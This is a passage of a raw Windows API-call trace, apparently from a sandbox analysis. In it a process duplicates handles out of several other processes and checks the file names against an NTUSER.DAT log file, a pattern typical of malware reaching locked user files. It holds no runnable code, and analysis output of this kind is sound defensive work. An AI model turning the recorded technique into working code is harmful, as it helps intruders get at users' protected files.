[0153.343] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.343] CloseHandle (hObject=0x670) returned 1 [0153.343] _wcsicmp (_Str1="\\RacMetaData.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 4 [0153.343] CloseHandle (hObject=0x680) returned 1 [0153.344] CloseHandle (hObject=0x62c) returned 1 [0153.344] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0153.344] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.344] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.344] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.345] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.345] CloseHandle (hObject=0x670) returned 1 [0153.345] _wcsicmp (_Str1="\\RacDatabase.sdf", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 4 [0153.345] CloseHandle (hObject=0x680) returned 1 [0153.345] CloseHandle (hObject=0x62c) returned 1 [0153.345] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0153.345] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x160, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.345] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.346] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.347] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.347] CloseHandle (hObject=0x670) returned 1 [0153.347] _wcsicmp (_Str1="\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0153.347] CloseHandle (hObject=0x680) returned 1 [0153.347] CloseHandle (hObject=0x62c) returned 1 [0153.347] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0153.347] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.347] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.348] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.348] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.348] CloseHandle (hObject=0x670) returned 1 [0153.348] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0153.348] CloseHandle (hObject=0x680) returned 1 [0153.348] CloseHandle (hObject=0x62c) returned 1 [0153.349] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0153.349] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.349] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.349] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.350] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.350] CloseHandle (hObject=0x670) returned 1 [0153.350] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0153.350] CloseHandle (hObject=0x680) returned 1 [0153.350] CloseHandle (hObject=0x62c) returned 1 [0153.350] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0153.350] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.350] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.351] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.351] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.351] CloseHandle (hObject=0x670) returned 1 [0153.351] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0153.352] CloseHandle (hObject=0x680) returned 1 [0153.352] CloseHandle (hObject=0x62c) returned 1 [0153.352] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0153.352] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.352] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.353] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.353] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.353] CloseHandle (hObject=0x670) returned 1 [0153.353] _wcsicmp (_Str1="\\WinSATAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.353] CloseHandle (hObject=0x680) returned 1 [0153.353] CloseHandle (hObject=0x62c) returned 1 [0153.353] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0153.354] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.354] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.354] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.355] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.355] CloseHandle (hObject=0x670) returned 1 [0153.355] _wcsicmp (_Str1="\\RacWmiDatabase.sdf", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 4 [0153.355] CloseHandle (hObject=0x680) returned 1 [0153.355] CloseHandle (hObject=0x62c) returned 1 [0153.355] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0153.355] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x34c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.355] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.356] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.357] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.357] CloseHandle (hObject=0x670) returned 1 [0153.357] _wcsicmp (_Str1="\\sqlB846.tmp", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0153.357] CloseHandle (hObject=0x680) returned 1 [0153.357] CloseHandle (hObject=0x62c) returned 1 [0153.357] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0153.357] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x370, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.357] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.358] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.358] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.358] CloseHandle (hObject=0x670) returned 1 [0153.358] _wcsicmp (_Str1="\\sqlB857.tmp", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0153.358] CloseHandle (hObject=0x680) returned 1 [0153.358] CloseHandle (hObject=0x62c) returned 1 [0153.359] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x114) returned 0x62c [0153.359] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.359] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.359] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.360] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.360] CloseHandle (hObject=0x670) returned 1 [0153.360] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0153.360] CloseHandle (hObject=0x680) returned 1 [0153.360] CloseHandle (hObject=0x62c) returned 1 [0153.360] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x114) returned 0x62c [0153.360] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.360] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.361] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.361] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.362] CloseHandle (hObject=0x670) returned 1 [0153.362] CloseHandle (hObject=0x680) returned 1 [0153.362] CloseHandle (hObject=0x62c) returned 1 [0153.362] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x114) returned 0x62c [0153.362] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.362] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.363] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.363] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.363] CloseHandle (hObject=0x670) returned 1 [0153.363] _wcsicmp (_Str1="\\EQUATION", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0153.363] CloseHandle (hObject=0x680) returned 1 [0153.364] CloseHandle (hObject=0x62c) returned 1 [0153.364] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x114) returned 0x62c [0153.364] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xfc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.364] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.364] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.365] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.365] CloseHandle (hObject=0x670) returned 1 [0153.365] _wcsicmp (_Str1="\\Fonts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -8 [0153.365] CloseHandle (hObject=0x680) returned 1 [0153.365] CloseHandle (hObject=0x62c) returned 1 [0153.365] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x88c) returned 0x62c [0153.365] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.365] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.366] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.367] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.367] CloseHandle (hObject=0x670) returned 1 [0153.367] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0153.367] CloseHandle (hObject=0x680) returned 1 [0153.367] CloseHandle (hObject=0x62c) returned 1 [0153.367] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x88c) returned 0x62c [0153.367] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x74, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.367] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.368] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.368] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.368] CloseHandle (hObject=0x670) returned 1 [0153.368] CloseHandle (hObject=0x680) returned 1 [0153.368] CloseHandle (hObject=0x62c) returned 1 [0153.368] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x88c) returned 0x62c [0153.368] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x148, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.368] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.369] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.370] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.370] CloseHandle (hObject=0x670) returned 1 [0153.370] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0153.370] CloseHandle (hObject=0x680) returned 1 [0153.370] CloseHandle (hObject=0x62c) returned 1 [0153.370] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x88c) returned 0x62c [0153.370] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.370] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.371] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.371] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.371] CloseHandle (hObject=0x670) returned 1 [0153.371] CloseHandle (hObject=0x680) returned 1 [0153.371] CloseHandle (hObject=0x62c) returned 1 [0153.372] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0153.372] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.372] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.372] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.373] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.373] CloseHandle (hObject=0x670) returned 1 [0153.373] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0153.373] CloseHandle (hObject=0x680) returned 1 [0153.373] CloseHandle (hObject=0x62c) returned 1 [0153.373] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0153.373] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x60, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.373] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.374] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.374] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.374] CloseHandle (hObject=0x670) returned 1 [0153.375] CloseHandle (hObject=0x680) returned 1 [0153.375] CloseHandle (hObject=0x62c) returned 1 [0153.375] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0153.375] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.375] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.375] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.376] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.376] CloseHandle (hObject=0x670) returned 1 [0153.376] _wcsicmp (_Str1="\\MPLog-07132009-221054.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.376] CloseHandle (hObject=0x680) returned 1 [0153.376] CloseHandle (hObject=0x62c) returned 1 [0153.376] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0153.376] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x270, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.376] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.377] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.377] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.378] CloseHandle (hObject=0x670) returned 1 [0153.378] CloseHandle (hObject=0x680) returned 1 [0153.378] CloseHandle (hObject=0x62c) returned 1 [0153.378] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0153.378] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x390, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.378] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.379] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.380] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.380] CloseHandle (hObject=0x670) returned 1 [0153.380] _wcsicmp (_Str1="\\My", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.380] CloseHandle (hObject=0x680) returned 1 [0153.380] CloseHandle (hObject=0x62c) returned 1 [0153.380] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0153.380] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.380] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.381] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.381] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.381] CloseHandle (hObject=0x670) returned 1 [0153.381] _wcsicmp (_Str1="\\mpengine.dll", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.381] CloseHandle (hObject=0x680) returned 1 [0153.382] CloseHandle (hObject=0x62c) returned 1 [0153.382] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x618) returned 0x62c [0153.382] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.382] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.382] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.383] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.383] CloseHandle (hObject=0x670) returned 1 [0153.383] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0153.383] CloseHandle (hObject=0x680) returned 1 [0153.383] CloseHandle (hObject=0x62c) returned 1 [0153.383] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x618) returned 0x62c [0153.383] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.383] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.384] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.385] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.385] CloseHandle (hObject=0x670) returned 1 [0153.385] CloseHandle (hObject=0x680) returned 1 [0153.385] CloseHandle (hObject=0x62c) returned 1 [0153.386] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d8098) returned 1 [0153.386] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0153.386] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0153.386] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, 